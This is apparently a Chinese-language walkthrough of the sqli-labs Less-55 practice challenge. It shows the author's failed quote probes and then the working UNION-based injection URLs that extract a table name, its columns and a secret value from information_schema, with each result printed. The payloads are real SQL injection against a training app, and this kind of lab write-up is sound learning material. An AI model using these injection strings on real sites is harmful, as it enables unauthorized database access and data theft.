chicken dinner!让我们继续吧~

ab200a72f031678f50a51d70d24a946.png

http://sqlilabs/Less-55/?id=1' 回显错误
http://sqlilabs/Less-55/?id=1'%23 回显错误
http://sqlilabs/Less-55/?id=1')%23 回显错误
http://sqlilabs/Less-55/?id=1'))%23 回显错误
http://sqlilabs/Less-55/?id=1')))%23 回显错误

...五次机会就这样没了,秉承着不看 SQL 的倔强,又试了双引号,但是还是回显错误,没错,那就只剩下一个可能了,试试括号?...此时想骂人...因为真的是

http://sqlilabs/Less-55/?id=-1) union select 1,(select table_name from information_schema.tables where table_schema=database()),3%23

f4b9119397b239bb1837666fbcdb028.png

得到表名:rq27n6wrrp

http://sqlilabs/Less-55/?id=-1) union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='rq27n6wrrp'),3%23

f4b9119397b239bb1837666fbcdb028.png

得到列名:id,sessid,secret_F3GH,tryy

http://sqlilabs/Less-54/?id=-1) union select 1,(select group_concat(secret_F3GH) from rq27n6wrrp),3%23

ca19e39e38b75d6c04c4b14618e9f2d.png

得到密码:U8xUjN0vel0kzfTr5XOqtiG5

Get it!!!

4a38e1a07a34da333685c1889e8ae22.png

:D